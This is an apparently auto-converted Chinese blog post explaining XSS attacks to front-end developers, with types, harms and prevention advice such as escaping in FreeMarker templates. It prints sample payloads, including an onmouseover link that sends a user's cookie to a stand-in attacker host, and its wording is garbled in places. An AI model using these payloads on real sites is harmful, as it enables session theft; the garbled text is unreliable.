前端xss攻击
实习的时候在项目中有接触过关于xss攻击的内容,而且使用了项目组中推荐的一些经常使用的防xss攻击的方法对项目进行了防攻击的完善。但一直没有时间深刻了解这东西,在此,作一个简单的梳理。javascript
xss是什么
xss跨站脚本攻击(Cross Site Scripting),是一种常常出如今web应用中的计算机安全漏洞,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入的恶意html代码会被执行,从而达到恶意用户的特殊目的。
XSS属于被动式的攻击,由于其被动且很差利用,因此许多人常忽略其危害性。可是随着前端技术的不断进步,这方面的问题愈来愈受关注。举个简单例子 : 假如你如今是sns站点上一个用户,发布信息的功能存在漏洞能够执行js 你在 此刻输入一个 恶意脚本,alert(),那么当前全部看到你新信息的人的浏览器都会执行这个脚本弹出提示框。固然,这只是小儿科了,若是搞个更为激烈的,后果将很严重。
这个攻击过程看到有人总结了一个比较直观的图,供理解。
php
xss攻击的危害
XSS攻击的危害包括:html
盗取各种用户账号,如机器登陆账号、用户网银账号、各种管理员账号前端
控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力java
盗窃企业重要的具备商业价值的资料web
非法转帐浏览器
强制发送电子邮件安全
网站挂马服务器
控制受害者机器向其它网站发起攻击
举例:cookie
<body background=”javascript:alert(‘xss webjiaocheng!’)”>
<iframe src=javascript:alert(‘xss webjiaocheng!’)”>
<body onload=”a();”><script>function a(){alert(‘xss webjiaocheng!’)”></script></body>
哪些xss攻击
从其它站点到应用站点的攻击:故名思义,这种攻击是由外部发起的,来自email或其它站点。这种攻击在用户点击连接,下载图片或者提交表单的时候,对应用网站进行了意想以外的操做。
一般用户登陆后会获得一个可用session,xss攻击者能够利用这个session,越过用户验证,进行一些不安全的操做,以下:
<a href = “http:// www.2cto.com /addComment.php?subject = I am owned” >
Check it out!
</a>
经过这个连接,只要用户登陆了,就会发送一个subject,即便在其它网站上。
正因如此,通常的邮箱客户端不会自动从不信任的网站上加载图片(由于考虑到能够经过img的src属性向第三方站点发送GET请求);另外,能够设置session的过时时间,让session自动失效。
从应用站点到同站或其它站点的攻击:这种攻击,一般是攻击者在应用站点上经过发表评论,或者其它方式嵌入代码,当用户加载页面或者点击连接就会产生一些意想以外的操做。
以下:
<a href=”#” onmouseover = “window.location ='http://reallybadguys.net/collectCookie.php?cookie =' + documentcookie.escape();” > Check it out!</a>
当用户滑过连接,就会将cookie信息发到攻击者的服务器上。
看到有的资料上面是按照另一种方式进行概括的:
本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。
其攻击过程以下:
A给B发送一个恶意构造了Web的URL。B点击并查看了这个URL。
恶意页面中的JavaScript打开一个具备漏洞的HTML页面并将其安装在Bob电脑上。具备漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。
A的恶意脚本能够在Bob的电脑上执行B所持有的权限下的命令。反射式漏洞
这种漏洞和类型A有些相似,不一样的是Web客户端使用Server端脚本生成页面为用户提供数据时,若是未经验证的用户数据被包含
在页面中而未经HTML实体编码,客户端代码便可以注入到动态页面中。
预防
做为前端开发人员,咱们须要尽可能让本身的代码足够强大和足够完善,而且随着开发经验的增加,相信对于本身熟悉的技术领域的防xss攻击,也会有更多和更深刻的理解,下面仅列举几个方面,之后能够对这部份内容不断进行扩充。
对于名字,描述之类的数据,须要格外注意其数据来源,在自测过程当中,多输入xss异常数据。如:
></script><iframe/onload=alert(2)>
之类的xss脚本。方便发现潜在的漏洞。
在js中使用innerHTML方法修改dom的时候,要对数据进行转义。
在使用一些模板语言的时候,以freemarker为例,入口文件可用
<#escape x as x?html> ... </#escape>
指令包裹,这样能够保证该指令之间的模版数据在输出数据时默认转义。某些特定状况下,不方便使用<#escape>指令的时候,能够在输出的地方进行转义,如:${name?html},html方法既为ftl的转义指令。
- 1. 【前端】XSS攻击
- 2. 前端的CSRF攻击和XSS攻击
- 3. 前端安全 -- XSS攻击
- 4. 前端安全之XSS攻击
- 5. 前端安全之XSS和csrf攻击
- 6. 【前端安全】JavaScript防XSS攻击
- 7. 前端安全之 xss 攻击
- 8. 转:前端安全之XSS攻击
- 9. 前端安全之 XSS攻击
- 10. XSS攻击 CSRF攻击
- 更多相关文章...
- • WSDL 端口 - WSDL 教程
- • XSLT - 在客户端 - XSLT 教程
- • 使用阿里云OSS+CDN部署前端页面与加速静态资源
- • Docker容器实战(一) - 封神Server端技术
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. Duang!超快Wi-Fi来袭
- 2. 机器学习-补充03 神经网络之**函数(Activation Function)
- 3. git上开源maven项目部署 多module maven项目(多module maven+redis+tomcat+mysql)后台部署流程学习记录
- 4. ecliple-tomcat部署maven项目方式之一
- 5. eclipse新导入的项目经常可以看到“XX cannot be resolved to a type”的报错信息
- 6. Spark RDD的依赖于DAG的工作原理
- 7. VMware安装CentOS-8教程详解
- 8. YDOOK:Java 项目 Spring 项目导入基本四大 jar 包 导入依赖,怎样在 IDEA 的项目结构中导入 jar 包 导入依赖
- 9. 简单方法使得putty(windows10上)可以免密登录树莓派
- 10. idea怎么用本地maven
- 1. 【前端】XSS攻击
- 2. 前端的CSRF攻击和XSS攻击
- 3. 前端安全 -- XSS攻击
- 4. 前端安全之XSS攻击
- 5. 前端安全之XSS和csrf攻击
- 6. 【前端安全】JavaScript防XSS攻击
- 7. 前端安全之 xss 攻击
- 8. 转:前端安全之XSS攻击
- 9. 前端安全之 XSS攻击
- 10. XSS攻击 CSRF攻击